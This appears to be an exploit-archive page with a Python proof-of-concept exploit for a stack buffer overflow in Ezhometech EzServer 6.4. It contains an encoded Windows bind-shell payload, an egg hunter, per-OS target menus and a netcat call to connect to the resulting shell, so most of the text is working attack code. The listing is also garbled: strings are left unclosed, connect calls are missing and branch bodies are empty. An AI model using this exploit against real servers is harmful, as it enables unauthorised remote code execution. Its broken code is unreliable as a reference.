Ezhometech Ezserver 6.4 Stack Overflow Exploit

Author: modpr0be Published: 2012-06-19 Verified: Verified



# Exploit Title: Ezhometech EzServer <=6.4 Stack Overflow Vulnerability
# Author: modpr0be
# Contact: research[at]Spentera[dot]com
# Platform: Windows
# Tested on: Windows XP SP3 (OptIn), Windows 2003 SP2 (OptIn)
# Software Link: http://www.ezhometech.com/buy_ezserver.htm
# References: http://www.spentera.com/2012/06/ezhometech-ezserver-6-4-stack-overflow-vulnerability/
### Software Description
# EZserver is a Video Server that stream Full HD to various devices.

### Vulnerability Details
# Buffer overflow condition exist in URL handling, sending long GET request
# will cause server process to exit and may allow malicious code injection.
# Further research found that the application does not care about the HTTP method,
# so that by sending long characters will make the program crash.
### Vendor logs:
# 06/11/2012 - Bug found
# 06/12/2012 - Vendor contacted
# 06/16/2012 - No response from vendor, POC release.


import sys
import struct
from socket import *
from os import system
from time import sleep

hunt = (

#windows/shell_bind_tcp - 751 bytes
#Encoder: x86/alpha_upper
#AutoRunScript=, VERBOSE=false, EXITFUNC=process, LPORT=4444,

shellcode = ("\x89\xe5\xda\xcf\xd9\x75\xf4\x5d\x55\x59\x49\x49\x49\x49\x43"

junk1 = "\x41" * 5025
junk2 = "\x42" * 5029
junk3 = "\x43" * 10000
buff = "w00tw00t"
buff+= shellcode
buff+= "\x90" * 100
buff+= "\xeb\x08\x90\x90"
buff+= struct.pack('<L', 0x10212779)
buff+= "\x90" * 16
buff+= hunt
buff+= "\x44" * 5000

def winxp():
  host = raw_input("[!] Target IP: ")
  print "[!] Connecting to %s on port 8000" %host
  s = socket(AF_INET, SOCK_STREAM)
  print "[+] Launching attack.."
  print "[+] Sending payload.."
  payload = junk1+buff
  s.send (payload)
  print "[+] Wait for hunter.."
  print "[+] Connecting to target shell!"
  system("nc -v %s 4444" %host)
  print "[x] Could not connect to the server x_x"
def win2k3():
  host = raw_input("[!] Target IP: ")
  print "[!] Connecting to %s on port 8000" %host
  s = socket(AF_INET, SOCK_STREAM)
  print "[+] Launching attack.."
  print "[+] Sending payload.."
  payload = junk2+buff
  print "[+] Wait for hunter.."
  print "[+] Connecting to target shell!"
  system("nc -v %s 4444" %host)
  print "[x] Could not connect to the server x_x"
def crash():
  host = raw_input("[!] Target IP: ")
  print "[!] Connecting to %s on port 8000" %host
  s = socket(AF_INET, SOCK_STREAM)
  print "[+] Launching attack.."
  print "[+] Sending payload.."
  payload = junk3
  s.send (payload)
  print "[+] Server should be crashed! Check your debugger"
  print "[x] Could not connect to the server x_x"

print "#################################################################"
print "#     EZHomeTech EZServer <= Stack Overflow Exploit #"
print "#              by modpr0be[at]spentera | @modpr0be  #"
print "#           thanks to: otoy, cikumel, y0k | @spentera  #"
print "================================================================="
print "\t1.Windows XP SP3 (DEP OptIn) bindshell on port 4444"
print "\t2.Windows 2003 SP2 (DEP OptIn) bindshell on port 4444"
print "\t3.Crash only (debug)\n"

a = 0
while a < 3:
 a = a + 1
 op = input ("[!] Choose your target OS: ")
 if op == 1:
 elif op == 2:
 elif op == 3:
  print "[-] Oh plz.. pick the right one :)\r\n"